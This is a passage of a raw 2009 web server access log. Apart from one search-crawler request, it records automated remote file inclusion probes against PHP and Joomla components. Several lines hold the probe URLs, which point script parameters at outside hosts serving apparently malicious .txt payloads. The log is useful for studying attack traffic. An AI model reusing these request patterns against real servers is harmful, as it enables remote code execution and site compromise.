72.30.142.163 - - [13/Mar/2009:06:58:20 -0500] "GET /logs/access_log.1211932800 HTTP/1.0" 200 393520 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
67.76.163.60 - - [13/Mar/2009:06:58:27 -0500] "GET /htmltonuke.php?filnavn=http://gumansin.com/id.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
67.76.163.60 - - [13/Mar/2009:06:58:27 -0500] "GET /logs/htmltonuke.php?filnavn=http://gumansin.com/id.txt?? HTTP/1.1" 404 303 "-""Mozilla/5.0"
67.76.163.60 - - [13/Mar/2009:06:58:27 -0500] "GET /logs/access_log.1215216000%20%20/htmltonuke.php?filnavn=http://gumansin.com/id.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
67.76.163.60 - - [13/Mar/2009:06:58:27 -0500] "GET /logs/access_log.1217289600%20%20/htmltonuke.php?filnavn=http://gumansin.com/id.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
61.62.162.42 - - [13/Mar/2009:06:58:51 -0500] "GET //components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.ydcommunity.com/board/data/idomila.txt? HTTP/1.1" 404 334 "-""libwww-perl/5.803"
67.76.163.60 - - [13/Mar/2009:07:00:25 -0500] "GET /logs/htmltonuke.php?filnavn=http://gumansin.com/id.txt?? HTTP/1.1" 404 303 "-""Mozilla/5.0"
67.76.163.60 - - [13/Mar/2009:07:00:25 -0500] "GET /htmltonuke.php?filnavn=http://gumansin.com/id.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
67.76.163.60 - - [13/Mar/2009:07:00:25 -0500] "GET /logs/access_log.1214092800/htmltonuke.php?filnavn=http://gumansin.com/id.txt?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
67.76.163.60 - - [13/Mar/2009:07:00:55 -0500] "GET /logs/access_log.1217635200/htmltonuke.php?filnavn=http://gumansin.com/id.txt?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
165.194.27.141 - - [13/Mar/2009:07:03:01 -0500] "GET /logs//administrator/components/com_extcalendar/errors.php?error=http://www.champrond-en-gatine.org/sessions/errors.txt?? HTTP/1.1" 404 341 "-""libwww-perl/5.805"
165.194.27.141 - - [13/Mar/2009:07:03:01 -0500] "GET /logs//administrator/components/com_extcalendar/errors.php?error=http://www.champrond-en-gatine.org/sessions/errors.txt?? HTTP/1.1" 404 341 "-""libwww-perl/5.805"
165.194.27.141 - - [13/Mar/2009:07:03:01 -0500] "GET //administrator/components/com_extcalendar/errors.php?error=http://www.cham